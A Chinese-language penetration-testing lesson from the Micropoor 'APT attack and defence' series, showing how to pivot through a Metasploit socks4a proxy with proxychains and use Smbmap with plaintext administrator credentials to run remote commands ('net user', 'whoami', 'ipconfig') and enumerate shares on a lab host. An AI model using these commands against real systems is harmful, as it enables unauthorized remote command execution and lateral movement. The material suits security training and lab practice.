第五十五課:與Smbmap結(jié)合攻擊
專注APT攻擊與防御
https://micropoor.blogspot.com/
Msf在配合其它框架攻擊,可補充msf本身的不足以及強化攻擊方式,優(yōu)化攻擊線路,。本季將會把msf與Smbmap結(jié)合攻擊。彌補msf文件搜索以及文件內(nèi)容搜索的不足。
項目地址:https://github.com/ShawnDEvans/smbmap
支持傳遞哈希
文件上傳/下載/刪除
可枚舉(可寫共享,配合Metasploit)
遠程命令執(zhí)行
支持文件內(nèi)容搜索
支持文件名匹配(可以自動下載)
msf配合Smbmap攻擊需要使用到sock4a模塊
1 msf auxiliary(server/socks4a) > show options
該模塊socks4a加入job
1 msf auxiliary(server/socks4a) > jobs
配置proxychains,做結(jié)合攻擊鋪墊,。
1 root@John:/tmp# cat /etc/proxychains.conf
支持遠程命令
1 root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk
group ‐H 192.168.1.115 ‐x 'net user'
1 root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk
group ‐H 192.168.1.115 ‐x 'whoami'
枚舉目標機共享
1 root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk
group ‐H 192.168.1.115 ‐d ABC
1 root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk
group ‐H 192.168.1.115 ‐x 'ipconfig'
Smbmap支持IP段的共享枚舉,當然Smbmap還有更多強大的功能等待探索。
Micropoor
?
